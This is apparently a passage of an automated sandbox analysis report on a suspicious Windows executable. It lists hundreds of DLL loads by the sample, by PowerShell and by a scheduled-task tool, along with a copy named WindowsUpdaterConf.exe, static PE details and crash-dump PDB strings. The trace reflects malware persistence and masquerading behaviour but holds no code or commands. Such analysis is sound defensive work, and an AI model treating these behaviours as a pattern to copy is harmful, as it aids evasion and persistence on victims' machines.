Source: C:\Users\user\Desktop\file.exe | Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: avicap32.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: wbemcomn.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Roaming\file.exe Section loaded: wbemcomn.dll
                            Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
                            Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: mscoree.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: apphelp.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: version.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: wldp.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: amsi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: userenv.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: profapi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: msasn1.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: gpapi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: wbemcomn.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: mscoree.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: version.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: wldp.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: amsi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: userenv.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: profapi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: msasn1.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: gpapi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: wbemcomn.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: mscoree.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: version.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: wldp.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: amsi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: userenv.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: profapi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: msasn1.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: gpapi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: wbemcomn.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: mscoree.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: version.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: wldp.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: amsi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: userenv.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: profapi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: msasn1.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: gpapi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: wbemcomn.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: mscoree.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: version.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: wldp.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: amsi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: userenv.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: profapi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: msasn1.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: gpapi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: wbemcomn.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: mscoree.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: version.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: wldp.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: amsi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: userenv.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exe Section loaded: profapi.dll
                            Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                            Source: Window Recorder Window detected: More than 3 window changes detected
                            Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                            Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: file.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                            Source: file.exe Static file information: File size 3507712 > 1048576
                            Source: file.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x357c00
                            Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: mscorlib.pdba source: WER3CD5.tmp.dmp.42.dr
                            Source: Binary string: System.Management.pdbTz source: WERB32D.tmp.dmp.19.dr
                            Source: Binary string: System.pdbMZ@ source: WER5266.tmp.dmp.39.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: mscorlib.pdb source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: mscorlib.pdbSystem.Management.ni.dll source: WERB32D.tmp.dmp.19.dr
                            Source: Binary string: System.ni.pdbRSDS source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: System.Management.pdb source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: System.Management.pdbL0 source: WER5266.tmp.dmp.39.dr
                            Source: Binary string: mscorlib.ni.pdb source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: System.Management.ni.pdb source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: mscorlib.ni.pdbRSDS source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: System.ni.pdb source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: System.pdb source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr

                            Data Obfuscation

